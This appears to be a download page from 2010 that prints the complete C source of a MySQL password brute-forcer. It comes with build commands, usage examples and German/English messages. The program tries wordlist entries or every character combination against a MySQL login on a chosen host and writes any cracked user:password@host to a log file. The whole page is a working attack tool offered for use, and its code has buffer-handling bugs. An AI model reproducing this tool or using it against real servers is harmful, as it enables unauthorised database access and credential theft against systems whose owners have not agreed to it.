Linux Source and Binarys
mysql-bruteforce.c (Sourcecode)
mysql-bruteforce.tar (sourcecode tarball)
mysql-bruteforce-binary-only.tar (compiled Binary)
You need to install ncurses
apt-get install libncurses5-dev libncurses5
Windows Source and Binarys
mysql-bruteforce-win32.tar (sourcecode tarball)
pdcurses.dll (PDCurses.dll)
libmySQL.dll (libmySQL.dll)
mysql-bruteforce-win32.c SourceCode for Windows
Here is the Source (Linux)
#include <stdio.h>
#include <mysql/mysql.h>
#include <curses.h>
#include <string.h>
#include <stdlib.h>
// Deutsch oder English
#define GER 1
#define ENG 0
/*
**************************************************************************************************
* MYSQL Bruteforce Programm aus purer lange Weile geschrieben
* 23.03 2010 by cd
*
* gcc mysql-bruteforce.c -o mysql-bruteforce -lmysqlclient -lncurses -O2 -Wall
* oder -O6 anstatt -O2
* ./mysql-bruteforce benutzer computer kennwortliste <optional länge des kennworts>
* log Datei ist "mysql-bruteforce.log"
*
**************************************************************************************************
**************************************************************************************************
*
* for the people that understand no german change the #define ENG to 1 and GER to 0
*
* compile with: gcc mysql-bruteforce.c -o mysql-bruteforce -lmysqlclient -lncurses -O3 -Wall
* or -O6 instead of -O2
* usage: ./mysql-bruteforce user host <password list> <optional len of password>
* log file is "mysql-bruteforce.log"
*
**************************************************************************************************
*
* Newest version http://bruteforce.at/mysql
*
* Think about the old good time MoD
* If you want to survive out here, you've got to know where your towel is.
*/
MYSQL *my;
int count=0;
char *passwd;
#define STARTCHR 46 // 33 set start ascii char
#define ENDCHR 122 // 127 set end ascii cahr
#define BUFF_SIZE 1024
#define LEN 80
char buffer[BUFF_SIZE];
int jump=0;
int main (int argc, char *argv[])
{
if (argc <= 3 )
{
#if ENG && !GER
printf("\n"
"\n MySQL Bruteforce, written by cd\n\n"
" via wordlist\n"
" %s root localhost wordlist # use complete wordlist\n"
" %s root 127.0.0.1 ../wordlist 7 # serch only words with 7 chars\n"
"\n"
" standard bruteforce\n"
" %s root localhost -b # Bruteforce Method (standard up to 8 chars)\n"
" %s root 127.0.0.1 -b 12 # up to 12 chars\n"
" %s root host -b 12 Test # start with the given Word\n\n\n\n\n",argv[0],argv[0],argv[0],argv[0],argv[0]);
#else
printf("\n"
"\n MySQL Bruteforce, geschrieben von cd\n\n"
" via Wörterliste\n"
" %s root localhost wordlist # Gesamte Wörterliste durchsuchen\n"
" %s root 127.0.0.1 ../wordlist 7 # suche nur Wörter mit 7 Buchstaben\n"
"\n"
" Standard Bruteforce\n"
" %s root localhost -b # Bruteforce Methode (standard bis zu 8 Buchstaben)\n"
" %s root 127.0.0.1 -b 12 # bis zu 12 Buchstaben\n"
" %s root host -b 12 Test # Startet mit angegebenen Wort\n\n\n\n\n",argv[0],argv[0],argv[0],argv[0],argv[0]);
#endif
return 0;
}
if(strcmp(argv[3],"-b"))
{
jump=0;
} else jump=1;
initscr();
printw("\n#################################\n#\tMYSQL Bruteforce\t#\n#\t2010 by cd\t\t#\n#################################\n\n\t\n");
refresh();
char host[20];
char user[20];
my = mysql_init(NULL);
FILE *pass_list,*logfile;
if( ( pass_list=fopen(argv[3],"r") ) == NULL && jump!=1 )
{
#if ENG && !GER
fprintf(stderr,"Cannot open File \"%s\"\n", argv[3]);
#else
fprintf(stderr,"Kann Datei \"%s\" nicht oeffnen.\n", argv[3]);
#endif
endwin();
return 0;
}
if( ( logfile=fopen("mysql-bruteforce.log","a+") ) == NULL )
{
#if ENG && !GER
fprintf(stderr,"Cannot open File \"%s\"\n", argv[3]);
#else
fprintf(stderr,"Kann Datei \"%s\" nicht oeffnen.\n", argv[3]);
#endif
endwin();
return 0;
}
if(my == NULL)
{
#if ENG && !GER
fprintf(stderr, "Initialization failed\n");
#else
fprintf(stderr, "Initialisierung fehlgeschlagen\n");
#endif
endwin();
return 0;
}
sprintf(user, "%s", argv[1]);
sprintf(host, "%s", argv[2]);
char eingabe;
#if ENG && !GER
mvprintw(5,2,"User: %s Host: %s ",user,host);
#else
mvprintw(5,2,"Benutzer: %s Server: %s ",user,host);
#endif
if (jump==1)
{
refresh();
eingabe='b';
}
else {eingabe='w';}
switch(eingabe)
{
case 'b':
while(1)
{
int min=1,max;
if (argc<=4)
{
max=8;
}
else
{
max=atoi(argv[4]);
}
char *pass=(char*)malloc(min);
int pos,x,found;
pass[min]='\0';
if (argc>=6)
{
min=strlen(argv[5]);
pass=argv[5];
pass[min+1]='\0';
pos=min;
if (atoi(argv[4])!=strlen(argv[5]))
{
#if ENG && !GER
mvprintw(7,0,"len of word must be the same the digit after -b\n"
"like: %s root localhost -b 4 abcd\n",argv[0]);
#else
mvprintw(7,0,"länge des Wortes muss die gleiche seien wie die zahl nach -b\n"
"z.B: %s root localhost -b 4 abcd\n",argv[0]);
#endif
refresh();
endwin();
return 0;
}
}
for(x=min;x<=max;x++)
{
if(x>min)
{
if (realloc(pass, x))
{
memset(pass, STARTCHR, x);
pass[x]='\0';
} else {
mvprintw(13,1,"error in realloc");
endwin();
return 1;
}
}
while(pass[0]<ENDCHR)
{
found=0;
if( mysql_real_connect (my,host,user,pass,NULL,0,NULL,0) == NULL)
{
move(6,2);
deleteln();
mvprintw(6,2,"Pass: %s",pass);
refresh();
}
else
{
move(6,2);
deleteln();
mvprintw(6,2,"Pass: %s",pass);
refresh();
#if ENG && !GER
mvprintw(8,2,"Login Success:\t %s:%s@%s\n",user,pass,host);
#else
mvprintw(8,2,"Login Erfolgreich:\t %s:%s@%s\n",user,pass,host);
#endif
refresh();
endwin();
mysql_close(my);
fprintf(logfile,"%s:%s@%s\r\n",user,pass,host);
return 0;
}
for(pos=x-1;pos!=0;pos--)
{
if(pass[pos]==ENDCHR)
{
memset(pass+pos, STARTCHR, strlen(pass)-pos);
pass[pos-1]++;
found=1;
break;
}
}
if(!found)
pass[x-1]++;
count++;
}
}
move(6,2);
deleteln();
#if ENG && !GER
mvprintw(8,2,"Password not found for %s@%s :/",user,host);
#else
mvprintw(8,2,"Passwort fuer %s@%s nicht gefunden :/",user,host);
#endif
refresh();
endwin();
mysql_close (my);
return 0;
}
break;
}
int dummy;
while((fscanf(pass_list, "%s\r\n", buffer))!=EOF)
{
if (argv[4])
{
if (strlen(buffer)!=atoi(argv[4])) goto next; // blubb goto i know ^^ phuu
}
if( mysql_real_connect (my,host,user,buffer,NULL,0,NULL,0) == NULL)
{
move(6,2);
deleteln();
mvprintw(6,2,"Pass: %s",buffer);
refresh();
}
else
{
move(6,2);
deleteln();
mvprintw(6,2,"Pass: %s",buffer);
refresh();
#if ENG && !GER
mvprintw(8,2,"Login Success:\t %s:%s@%s\n",user,buffer,host);
#else
mvprintw(8,2,"Login Erfolgreich:\t %s:%s@%s\n",user,buffer,host);
#endif
refresh();
endwin();
mysql_close(my);
fprintf(logfile,"%s:%s@%s\r\n",user,buffer,host);
return 0;
}
next:
dummy=1;
}
move(6,2);
deleteln();
#if ENG && !GER
mvprintw(8,2,"Password not found for %s@%s :/",user,host);
#else
mvprintw(8,2,"Passwort fuer %s@%s nicht gefunden :/",user,host);
#endif
refresh();
endwin();
mysql_close (my);
return 0;
}